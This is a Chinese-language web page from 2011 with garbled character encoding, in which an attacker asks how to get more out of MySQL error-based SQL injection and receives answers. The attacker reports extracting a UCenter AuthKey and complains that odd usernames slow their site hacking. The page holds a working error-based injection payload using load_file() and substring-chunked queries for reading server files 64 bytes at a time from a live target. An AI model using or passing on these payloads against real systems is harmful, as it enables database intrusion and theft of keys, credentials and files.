關(guān)于Mysql報(bào)錯(cuò)注入的幾個(gè)問題

作者：來源：發(fā)布時(shí)間：2011-5-24 18:12:57 點(diǎn)擊：

No.1：Mysql報(bào)錯(cuò)注入最多能夠顯示多少字節(jié)呢？我Inject到的UC的AuthKey爆出62位一共應(yīng)該64位

No.2:爆出的用戶名中文和特殊符號顯示亂碼，用Hex()轉(zhuǎn)換了下爆出來再轉(zhuǎn)回去的時(shí)候依然亂碼,怎么解決？你知道國內(nèi)很多SB愛用各種怪異的符號做用戶名,嚴(yán)重影響日站的進(jìn)度。。

No.3：能否用報(bào)錯(cuò)注入Load_File(),我沒有成功語句如下：

and (select 1 from(select count(*),concat((select (select load_file(0x.........)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

1. 64 位，但是許多報(bào)錯(cuò)注入都會在前后加上特別符號，以方便分辨，如[]，就變成62位了，可以使用substring來處理

2. 如圖：

3. 同樣使用substring 以64為1單位慢慢讀, 最好就是寫個(gè)循環(huán)來讀

Select concat(substring(load_file(0x....),1,64)) FROM uc_applications limit 0,1

Select concat(substring(load_file(0x....),65,64)) FROM uc_applications limit 0,1

Select concat(substring(load_file(0x....),129,64)) FROM uc_applications limit 0,1

Tags：

Mysql 關(guān)于報(bào)錯(cuò)注入問題

上一篇:MySQL創(chuàng)建用戶及授權(quán)的簡單方法下一篇: 教你解決關(guān)于XP共享拒絕訪問的問題

關(guān)于Mysql報(bào)錯(cuò)注入的幾個(gè)問題

Tags：

相關(guān)軟件

相關(guān)文章

文章評論

欄目導(dǎo)航

本類熱門

本類推薦

本站熱門

本站推薦